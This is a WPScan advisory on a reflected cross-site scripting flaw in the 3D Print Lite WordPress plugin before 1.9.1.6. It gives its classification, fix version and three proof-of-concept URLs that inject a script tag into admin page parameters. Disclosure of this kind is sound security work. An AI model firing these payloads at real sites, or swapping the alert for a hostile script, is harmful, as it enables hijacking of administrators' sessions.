WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

3D Print Lite < 1.9.1.6 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape some user input before outputting it back in attributes, leading to Reflected Cross-Site Scripting issues

Proof of Concept

https://example.com/wp-admin/admin.php?page=p3dlite_materials&material_text="><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=p3dlite_printers&printer_text="><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=p3dlite_coatings&coating_text="><script>alert(/XSS/)</script> (< 1.9.1.5)

Affects Plugins

3dprint-lite
Fixed in version 1.9.1.6

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID
5909e225-5756-472e-a2fc-3ac52c7fb909

Timeline

Publicly Published

2021-10-11 (about 10 months ago)

Added

2021-10-11 (about 10 months ago)

Last Updated

2021-10-11 (about 10 months ago)

Our Other Services

WPScan WordPress Security Plugin